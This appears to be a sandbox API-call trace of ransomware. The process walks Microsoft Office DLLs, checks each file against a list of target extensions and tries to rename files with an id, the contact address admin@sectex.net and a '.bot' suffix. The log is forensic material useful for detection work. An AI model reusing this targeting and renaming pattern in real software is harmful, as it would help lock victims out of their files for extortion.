	[0156.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchlts.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.233] lstrlenW (lpString=".doc") returned 4
	[0156.233] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.233] lstrlenW (lpString=".docx") returned 5
	[0156.233] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0156.233] lstrlenW (lpString=".pdf") returned 4
	[0156.233] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.233] lstrlenW (lpString=".xls") returned 4
	[0156.233] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.234] lstrlenW (lpString=".xlsx") returned 5
	[0156.234] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0156.234] lstrlenW (lpString=".ppt") returned 4
	[0156.234] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.234] lstrlenW (lpString=".zip") returned 4
	[0156.234] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.234] lstrlenW (lpString=".rar") returned 4
	[0156.234] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.234] lstrlenW (lpString=".bz2") returned 4
	[0156.234] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.234] lstrlenW (lpString=".7z") returned 3
	[0156.234] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.234] lstrlenW (lpString=".dbf") returned 4
	[0156.234] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.234] lstrlenW (lpString=".1cd") returned 4
	[0156.234] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.234] lstrlenW (lpString=".jpg") returned 4
	[0156.234] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.234] lstrlenW (lpString=".doc") returned 4
	[0156.234] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.234] lstrlenW (lpString=".docx") returned 5
	[0156.234] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0156.234] lstrlenW (lpString=".pdf") returned 4
	[0156.235] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.235] lstrlenW (lpString=".xls") returned 4
	[0156.235] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.235] lstrlenW (lpString=".xlsx") returned 5
	[0156.235] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0156.235] lstrlenW (lpString=".ppt") returned 4
	[0156.235] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.235] lstrlenW (lpString=".zip") returned 4
	[0156.235] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.235] lstrlenW (lpString=".rar") returned 4
	[0156.235] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.235] lstrlenW (lpString=".bz2") returned 4
	[0156.235] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.235] lstrlenW (lpString=".7z") returned 3
	[0156.235] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.235] lstrlenW (lpString=".dbf") returned 4
	[0156.235] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.235] lstrlenW (lpString=".1cd") returned 4
	[0156.235] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL") returned 61
	[0156.235] lstrlenW (lpString=".jpg") returned 4
	[0156.235] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.235] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.235] lstrlenW (lpString="AUDIOSEARCHMAIN.DLL") returned 19
	[0156.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchmain.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.236] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1667960) returned 1
	[0156.236] CloseHandle (hObject=0x38c) returned 1
	[0156.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchmain.dll")) returned 0x20
	[0156.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchmain.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.236] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchmain.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchmain.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0156.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.237] lstrlenW (lpString=".doc") returned 4
	[0156.237] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.237] lstrlenW (lpString=".docx") returned 5
	[0156.237] lstrcmpiW (lpString1=".docx", lpString2="N.DLL") returned -1
	[0156.237] lstrlenW (lpString=".pdf") returned 4
	[0156.237] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.237] lstrlenW (lpString=".xls") returned 4
	[0156.237] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.237] lstrlenW (lpString=".xlsx") returned 5
	[0156.237] lstrcmpiW (lpString1=".xlsx", lpString2="N.DLL") returned -1
	[0156.237] lstrlenW (lpString=".ppt") returned 4
	[0156.238] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.238] lstrlenW (lpString=".zip") returned 4
	[0156.238] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.238] lstrlenW (lpString=".rar") returned 4
	[0156.238] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.238] lstrlenW (lpString=".bz2") returned 4
	[0156.238] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.238] lstrlenW (lpString=".7z") returned 3
	[0156.238] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.238] lstrlenW (lpString=".dbf") returned 4
	[0156.238] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.238] lstrlenW (lpString=".1cd") returned 4
	[0156.238] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.238] lstrlenW (lpString=".jpg") returned 4
	[0156.238] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.238] lstrlenW (lpString=".doc") returned 4
	[0156.238] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.238] lstrlenW (lpString=".docx") returned 5
	[0156.238] lstrcmpiW (lpString1=".docx", lpString2="N.DLL") returned -1
	[0156.238] lstrlenW (lpString=".pdf") returned 4
	[0156.238] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.238] lstrlenW (lpString=".xls") returned 4
	[0156.238] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.238] lstrlenW (lpString=".xlsx") returned 5
	[0156.239] lstrcmpiW (lpString1=".xlsx", lpString2="N.DLL") returned -1
	[0156.239] lstrlenW (lpString=".ppt") returned 4
	[0156.239] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.239] lstrlenW (lpString=".zip") returned 4
	[0156.239] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.239] lstrlenW (lpString=".rar") returned 4
	[0156.239] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.239] lstrlenW (lpString=".bz2") returned 4
	[0156.239] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.239] lstrlenW (lpString=".7z") returned 3
	[0156.239] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.239] lstrlenW (lpString=".dbf") returned 4
	[0156.239] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.239] lstrlenW (lpString=".1cd") returned 4
	[0156.239] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHMAIN.DLL") returned 62
	[0156.239] lstrlenW (lpString=".jpg") returned 4
	[0156.239] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.239] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.239] lstrlenW (lpString="AUDIOSEARCHSAPIFE.DLL") returned 21
	[0156.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchsapife.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.240] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2242968) returned 1
	[0156.240] CloseHandle (hObject=0x38c) returned 1
	[0156.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchsapife.dll")) returned 0x20
	[0156.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchsapife.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.240] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchsapife.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchsapife.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0156.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.240] lstrlenW (lpString=".doc") returned 4
	[0156.240] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.241] lstrlenW (lpString=".docx") returned 5
	[0156.241] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1
	[0156.241] lstrlenW (lpString=".pdf") returned 4
	[0156.241] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.241] lstrlenW (lpString=".xls") returned 4
	[0156.241] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.241] lstrlenW (lpString=".xlsx") returned 5
	[0156.241] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1
	[0156.241] lstrlenW (lpString=".ppt") returned 4
	[0156.241] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.241] lstrlenW (lpString=".zip") returned 4
	[0156.241] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.241] lstrlenW (lpString=".rar") returned 4
	[0156.241] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.241] lstrlenW (lpString=".bz2") returned 4
	[0156.241] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.241] lstrlenW (lpString=".7z") returned 3
	[0156.241] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.241] lstrlenW (lpString=".dbf") returned 4
	[0156.241] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.241] lstrlenW (lpString=".1cd") returned 4
	[0156.241] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.242] lstrlenW (lpString=".jpg") returned 4
	[0156.242] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.242] lstrlenW (lpString=".doc") returned 4
	[0156.242] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.242] lstrlenW (lpString=".docx") returned 5
	[0156.242] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1
	[0156.242] lstrlenW (lpString=".pdf") returned 4
	[0156.242] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.242] lstrlenW (lpString=".xls") returned 4
	[0156.242] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.242] lstrlenW (lpString=".xlsx") returned 5
	[0156.242] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1
	[0156.242] lstrlenW (lpString=".ppt") returned 4
	[0156.242] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.242] lstrlenW (lpString=".zip") returned 4
	[0156.242] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.242] lstrlenW (lpString=".rar") returned 4
	[0156.242] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.242] lstrlenW (lpString=".bz2") returned 4
	[0156.242] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.242] lstrlenW (lpString=".7z") returned 3
	[0156.242] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.242] lstrlenW (lpString=".dbf") returned 4
	[0156.242] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.242] lstrlenW (lpString=".1cd") returned 4
	[0156.243] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHSAPIFE.DLL") returned 64
	[0156.243] lstrlenW (lpString=".jpg") returned 4
	[0156.243] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.243] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.243] lstrlenW (lpString="AUTHZAX.DLL") returned 11
	[0156.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\authzax.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.243] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=69000) returned 1
	[0156.243] CloseHandle (hObject=0x38c) returned 1
	[0156.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\authzax.dll")) returned 0x20
	[0156.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\authzax.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\authzax.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.244] lstrlenW (lpString=".doc") returned 4
	[0156.244] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.244] lstrlenW (lpString=".docx") returned 5
	[0156.244] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0156.244] lstrlenW (lpString=".pdf") returned 4
	[0156.244] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.244] lstrlenW (lpString=".xls") returned 4
	[0156.244] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.244] lstrlenW (lpString=".xlsx") returned 5
	[0156.244] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0156.244] lstrlenW (lpString=".ppt") returned 4
	[0156.244] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.244] lstrlenW (lpString=".zip") returned 4
	[0156.244] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.244] lstrlenW (lpString=".rar") returned 4
	[0156.244] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.244] lstrlenW (lpString=".bz2") returned 4
	[0156.244] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.244] lstrlenW (lpString=".7z") returned 3
	[0156.245] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.245] lstrlenW (lpString=".dbf") returned 4
	[0156.245] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.245] lstrlenW (lpString=".1cd") returned 4
	[0156.245] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.245] lstrlenW (lpString=".jpg") returned 4
	[0156.245] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.245] lstrlenW (lpString=".doc") returned 4
	[0156.245] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.245] lstrlenW (lpString=".docx") returned 5
	[0156.245] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0156.245] lstrlenW (lpString=".pdf") returned 4
	[0156.245] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.245] lstrlenW (lpString=".xls") returned 4
	[0156.245] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.245] lstrlenW (lpString=".xlsx") returned 5
	[0156.245] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0156.245] lstrlenW (lpString=".ppt") returned 4
	[0156.245] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.245] lstrlenW (lpString=".zip") returned 4
	[0156.245] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.245] lstrlenW (lpString=".rar") returned 4
	[0156.245] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.245] lstrlenW (lpString=".bz2") returned 4
	[0156.245] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.246] lstrlenW (lpString=".7z") returned 3
	[0156.246] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.246] lstrlenW (lpString=".dbf") returned 4
	[0156.246] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.246] lstrlenW (lpString=".1cd") returned 4
	[0156.246] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned 54
	[0156.246] lstrlenW (lpString=".jpg") returned 4
	[0156.246] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.246] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0156.246] lstrlenW (lpString="BCSAutogen.dll") returned 14
	[0156.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsautogen.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.247] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=50048) returned 1
	[0156.247] CloseHandle (hObject=0x38c) returned 1
	[0156.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsautogen.dll")) returned 0x20
	[0156.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\bcsautogen.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll" (normalized: "c:\\program files\\microsoft office\\office14\\bcsautogen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.247] lstrlenW (lpString=".doc") returned 4
	[0156.247] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0156.247] lstrlenW (lpString=".docx") returned 5
	[0156.247] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1
	[0156.247] lstrlenW (lpString=".pdf") returned 4
	[0156.247] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0156.247] lstrlenW (lpString=".xls") returned 4
	[0156.247] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0156.247] lstrlenW (lpString=".xlsx") returned 5
	[0156.247] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1
	[0156.247] lstrlenW (lpString=".ppt") returned 4
	[0156.247] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0156.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.247] lstrlenW (lpString=".zip") returned 4
	[0156.248] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0156.248] lstrlenW (lpString=".rar") returned 4
	[0156.248] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0156.248] lstrlenW (lpString=".bz2") returned 4
	[0156.248] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0156.248] lstrlenW (lpString=".7z") returned 3
	[0156.248] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0156.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.248] lstrlenW (lpString=".dbf") returned 4
	[0156.248] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0156.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.248] lstrlenW (lpString=".1cd") returned 4
	[0156.248] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0156.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BCSAutogen.dll") returned 57
	[0156.248] lstrlenW (lpString=".jpg") returned 4
	[0156.248] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
